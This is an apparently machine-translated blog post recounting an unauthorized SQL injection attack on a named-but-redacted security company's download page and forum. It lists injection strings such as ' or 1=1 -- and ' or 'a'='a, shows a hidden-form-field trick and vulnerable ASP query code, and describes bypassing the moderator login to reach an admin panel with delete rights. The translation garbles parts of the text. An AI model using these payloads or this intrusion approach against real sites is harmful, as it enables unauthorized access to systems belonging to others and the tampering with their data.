The whole process of SQL Injection penetrating a website of a network security company

This article is intended not to tell everyone how to perform intrusion, but to remind everyone that "intrusion is accidental, but security is not inevitable ", do not neglect some of the operational details.
I have always had the habit of visiting Security websites on a regular basis. Recently, I came to a famous network security company website in Guangzhou through a link under a coincidence. To be honest, this website seems to be quite diversified. In addition to providing Software downloading, we also have our own forum (hey, the interface is really good, I don't know how secure it is ?). Out of curiosity about his security ethics, the little God decided to make a preliminary "Security penetration test" for him ". At the beginning, I just used some comprehensive network vulnerability scanning tools (X-scan3.0, Nmap, retina, etc.) for information scanning, and then made a result screening, only the Peer Port tcp80 is enabled (that is, their server only provides normal HTTP services), and no typical vulnerability is found .... no, the other party is still a well-known enterprise after all (because the focus of this article is not here, so I will not describe this step here when I use the network vulnerability scanner for information scanning ). Just give up? It's not that easy... just recently, John has been sorting out SQL injection (SQL injection attacks) materials. Now, if you have the opportunity, I can "easily" help it to test it: P
Bytes ------------------------------------------------------------------------------------------
Tip:
Q: What is SQL injection?
A: The trick of this attack is to embed SQL query/behavior commands into legal HTTP request by embedding them to achieve the attacker's intention. Currently, many dynamic web pages obtain some parameters from users' requests, and then dynamically construct SQL requests to be sent to the database. For example, when a user needs to log on (user identity verification) through a user on the web page, the dynamic web page adds the user name and password submitted by the user to the SQL query request and sends it to the database to confirm whether the identity verification information submitted by the user is valid. From the perspective of SQL injection attacks, this can enable us to attack by modifying the user name and/or password value in the 'domain 'area when sending SQL requests.

For more information about SQL injection technology, see:
Http://demonalex.nease.net/ SQL _injection/walkthrough.txt
Bytes ------------------------------------------------------------------------------------------
First, download the system and select a tool:
Http: // The website of the security company/a directory/download/open. asp? Id = 3444
Bytes ------------------------------------------------------------------------------------------
Appendix: I have replaced some sensitive information in Chinese. Sorry.
Bytes ------------------------------------------------------------------------------------------
Http: // The website of the security company/a directory/download/open. asp? Id = 3444'
First, test whether the recipient has filtered '(single quotes )...

 

Description:
Q: How can I check whether a website has SQL Injection defects?
A: First, add some special character tags. The input is as follows:
Hi' or 1 = 1 --
Search for some login pages, enter the following in the login ID and password field, or in the URL:
-Login: Hi' or 1 = 1 --
-Pass: Hi' or 1 = 1 --
-Http: // duck/index.htm? Id = Hi' or 1 = 1 --
If you want to perform such a test in the form of 'hiding ', you can download the HTML webpage from the website to the local hard disk and modify the values of the hidden part, for example:
<Form action = http: // duck/search. asp method = post> 〉
<Input type = hidden name = A value = "Hi' or 1 = 1 --"> --"〉
</Form> 〉
If you are lucky, it is estimated that you can log on successfully without the account and password.
Bytes ------------------------------------------------------------------------------------------
Try the following URL to see if the normal page can be returned...
Http: // The website of the security company/a directory/download/open. asp? Id = 3444"
Http: // The website of the security company/a directory/download/open. asp? Id = 3444 'or 1 = 1 --
Http: // The website of the security company/a directory/download/open. asp? Id = 3444 "or 1 = 1 --
Http: // The website of the security company/a directory/download/open. asp? Id = 3444 'or 'A' = 'a
Http: // The website of the security company/a directory/download/open. asp? Id = 3444 "or" A "="
Bytes ------------------------------------------------------------------------------------------
Tip:
Q: Why use 'or 1 = 1 -- for testing?
A: Let's take a look at the importance of 'or 1 = 1 -- in other examples. Different from the normal login method, this method may be used to obtain some special information that cannot be obtained during normal login. Use the ASP page obtained from a link for example:
Http: // duck/index.htm? Category = food
In the above URL, 'category 'is a variable name, And 'food' is the value assigned to the variable. In order to do this (the link is successful), this ASP must contain the following relevant code (below is also the code we wrote to demonstrate this experiment ):
V_cat = request ("category ")
Sqlstr = "select * from product where pcategory = '" & v_cat &"'"
Set rsw.conn.exe cute (sqlstr)
As we can see, the variable value will be pre-processed and assigned to 'v _ cat', that is, the SQL statement will change:
Select * from product where pcategory = 'food'
This request will return the result obtained after comparing with the where condition. In this example, it is also 'food. Now imagine if we change the URL to this:
Http: // duck/index.htm? Category = food 'or 1 = 1 --
Now the value of our variable v_cat is equivalent to "food" or 1 = 1 -- ". If we want to re-import the SQL request, the SQL request will be:
Select * from product where pcategory = 'food' or 1 = 1 --'
Now this request selects each piece of information from the product table and does not check whether pcategory is equal to 'food '. The two '--' At the end is used to tell 'Ms SQL Server to ignore the last 'at the end (single quotes ). Sometimes you can use '#' instead. In any case, if the recipient is not an SQL Server (ms SQL Server here), or you cannot ignore the last single quotation mark in a simple way, you can try:
'Or 'A' = 'a
In this case, the entire SQL request will be changed:
Select * from product where pcategory = 'food' or 'A' = 'A'
It also returns the same result.
According to the actual situation, SQL Injection requests may change dynamically in a variety of ways:
'Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
'Or 'A' = 'a
"Or" A "="
') Or ('A' = 'a
Bytes ------------------------------------------------------------------------------------------
They all return "HTTP 500-internal server error", which seems to have failed again. We still have hope... at this time, we can only pin all our hopes on the forum...

Step by step, first find the URL of a post (this step I picked: http: // the security company's URL/Forum directory/list. asp? Ltid = 14) Repeat the previous behavior:
Http: // the security company's website/Forum directory/list. asp? Ltid = 14'
Http: // the security company's website/Forum directory/list. asp? Ltid = 14"
Http: // the security company's website/Forum directory/list. asp? Ltid = 14' or 1 = 1 --
Http: // the security company's website/Forum directory/list. asp? Ltid = 14 "or 1 = 1 --
Http: // the security company's website/Forum directory/list. asp? Ltid = 14' or 'A' = 'a
Http: // the security company's website/Forum directory/list. asp? Ltid = 14 "or" A "="
However, it seems that you are still eating ginkgo fruit... (as shown in)

In addition to the address bar, do not forget the login box of the Forum homepage:

In the "User name:" area, enter:
Network *** 'or 1 = 1 --
Then, enter a few passwords in the "Password:" Area: P.
Bytes ------------------------------------------------------------------------------------------
Appendix: "Network **" is the moderator account we see on the Forum homepage.
Bytes ------------------------------------------------------------------------------------------

Still not working. Try to launch an injection attack in the password area... specific operation:
In "username:", enter:
"Network ***"
Enter the following in "Password:
'Or 1 = 1 --
(After submission)

Fail... reuse:
'Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
'Or 'A' = 'a
"Or" A "="
After switching several times, I still cannot do it. It seems that it is "indestructible...
"The wind continues to blow and cannot bear to stay away..." the little god MP3 sang the song of 'Elder Brother' Leslie Cheung. Is that how to leave? To the Forum
Go around again in the page... with a glance, you can see the small link at the top of the Forum login area? Article 3
What is the link?

Click to jump out of the login window shown in:

First, select the corresponding layout in the "Forum:" block (here I picked the first layout "security tools"), and then try again:
Account: Network **** 'or 1 = 1 --
Password: Any password

No, try again:
Account: Network ***
Password: 'or 1 = 1 --
......
......
The little God's hand trembled for a moment, just because the "colored interface" came out:

At the beginning, I thought it was an illusion. I quickly clicked "Enter the background >>> "...

This time it seems to be true. Click one of the posts and try again:

(See it? There is a "delete" button. In fact, we can do more than this... ps: Xiao Shen is a good boy. ^_^)
Write it here. Is there an explanation ?! ^
The main purpose of this article is to introduce how to use SQL injection to penetrate the forum.
This is also a commonplace, but it cannot be imagined that even well-known network security companies have such vulnerabilities. In the end, people are aware of security.
This article tells us not to ignore some small details in operation.